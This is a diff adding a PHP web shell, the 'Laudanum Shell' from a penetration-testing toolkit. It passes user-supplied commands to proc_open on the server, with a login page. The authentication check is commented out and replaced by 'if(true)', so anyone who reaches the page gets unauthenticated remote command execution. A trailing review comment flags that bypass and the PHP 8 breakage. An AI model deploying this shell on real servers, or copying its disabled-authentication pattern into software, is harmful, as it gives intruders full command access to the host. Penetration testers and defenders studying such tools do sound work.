+if (isset($_POST['logout']))
+ logout();
+
+///* Attempt authentication. */
+//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
+// isset($ini['users'][$username])) {
+// if (strchr($ini['users'][$username], ':') === false) {
+// // No seperator found, assume this is a password in clear text.
+// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
+// } else {
+// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
+// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
+// }
+//}
+
+/* Attempt authentication. */
+if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
+ $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
+
+/* Enforce default non-authenticated state if the above code didn't set it
+ * already. */
+if (!isset($_SESSION['authenticated']))
+ $_SESSION['authenticated'] = false;
+
+if(true) {
+//if ($_SESSION['authenticated']) {
+ /* Initialize the session variables. */
+ if (empty($_SESSION['cwd'])) {
+ $_SESSION['cwd'] = '.';
+ $_SESSION['history'] = array();
+ $_SESSION['output'] = '';
+ }
+
+ if (!empty($command)) {
+ /* Save the command for late use in the JavaScript. If the command is
+ * already in the history, then the old entry is removed before the
+ * new entry is put into the list at the front. */
+ if (($i = array_search($command, $_SESSION['history'])) !== false)
+ unset($_SESSION['history'][$i]);
+
+ array_unshift($_SESSION['history'], $command);
+
+ /* Now append the commmand to the output. */
+ $_SESSION['output'] .= '$ ' . $command . "\n";
+
+ /* Initialize the current working directory. */
+ if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
+ $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
+ } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
+ /* The current command is a 'cd' command which we have to handle
+ * as an internal shell command. */
+
+ if ($regs[1]{0} == '/') {
+ /* Absolute path, we use it unchanged. */
+ $new_dir = $regs[1];
+ } else {
+ /* Relative path, we append it to the current working
+ * directory. */
+ $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+ }
+
+ /* Transform '/./' into '/' */
+ while (strpos($new_dir, '/./') !== false)
+ $new_dir = str_replace('/./', '/', $new_dir);
+
+ /* Transform '//' into '/' */
+ while (strpos($new_dir, '//') !== false)
+ $new_dir = str_replace('//', '/', $new_dir);
+
+ /* Transform 'x/..' into '' */
+ while (preg_match('|/\.\.(?!\.)|', $new_dir))
+ $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+
+ if ($new_dir == '') $new_dir = '/';
+
+ /* Try to change directory. */
+ if (@chdir($new_dir)) {
+ $_SESSION['cwd'] = $new_dir;
+ } else {
+ $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+ }
+
+ } elseif (trim($command) == 'exit') {
+ logout();
+ } else {
+
+ /* The command is not an internal command, so we execute it after
+ * changing the directory and save the output. */
+ chdir($_SESSION['cwd']);
+
+ // We canot use putenv() in safe mode.
+ if (!ini_get('safe_mode')) {
+ // Advice programs (ls for example) of the terminal size.
+ putenv('ROWS=' . $rows);
+ putenv('COLUMNS=' . $columns);
+ }
+
+ /* Alias expansion. */
+ $length = strcspn($command, " \t");
+ $token = substr($command, 0, $length);
+ if (isset($ini['aliases'][$token]))
+ $command = $ini['aliases'][$token] . substr($command, $length);
+
+ $io = array();
+ $p = proc_open($command,
+ array(1 => array('pipe', 'w'),
+ 2 => array('pipe', 'w')),
+ $io);
+
+ /* Read output sent to stdout. */
+ while (!feof($io[1])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+ ENT_COMPAT, 'UTF-8');
+ }
+ /* Read output sent to stderr. */
+ while (!feof($io[2])) {
+ $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+ ENT_COMPAT, 'UTF-8');
+ }
+
+ fclose($io[1]);
+ fclose($io[2]);
+ proc_close($p);
+ }
+ }
+
+ /* Build the command history for use in the JavaScript */
+ if (empty($_SESSION['history'])) {
+ $js_command_hist = '""';
+ } else {
+ $escaped = array_map('addslashes', $_SESSION['history']);
+ $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+ }
+}
+
+?>
+
+
+
+ Laudanum Shell
+
+
+
+
+
+
+
+

Laudanum Shell

+ +
+ + + +
+ Authentication + + Login failed, please try again:

' . "\n"; + else + echo "

Please login:

\n"; + ?> + +

Username:

+ +

Password:

+ +

+ + + +
+ + + +
+ Current Working Directory: + + +
+ +

+ $  +

+
+ +

+ Size: × + + + +

+ +
+ + + +
+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Updated by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +
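Review bot: The command-execution branch is entered through `if(true) {` with `//if ($_SESSION['authenticated']) {` commented out, so any request that passes `include 'ipcheck.php'` reaches `proc_open($command, ...)` without a credential check. The "Attempt authentication" test above it reads `$nounce`, `$username`, `$password` and `$users`, none of which is assigned in this hunk (their `$_POST` reads are commented out), so it could not set the flag even if the gate were restored. Either restore the gate as `if ($_SESSION['authenticated']) {` together with those assignments, comparing the digest with `hash_equals()` rather than `==` on an unsalted SHA-1, or delete the dead login code and add a comment stating that access control rests on ipcheck.php (not shown in this hunk) alone. Independently, `get_magic_quotes_gpc()` and the `$regs[1]{0}` offset syntax were removed in PHP 8, so the template fails there; writing `$regs[1][0]` and dropping the magic-quotes branch would fix it.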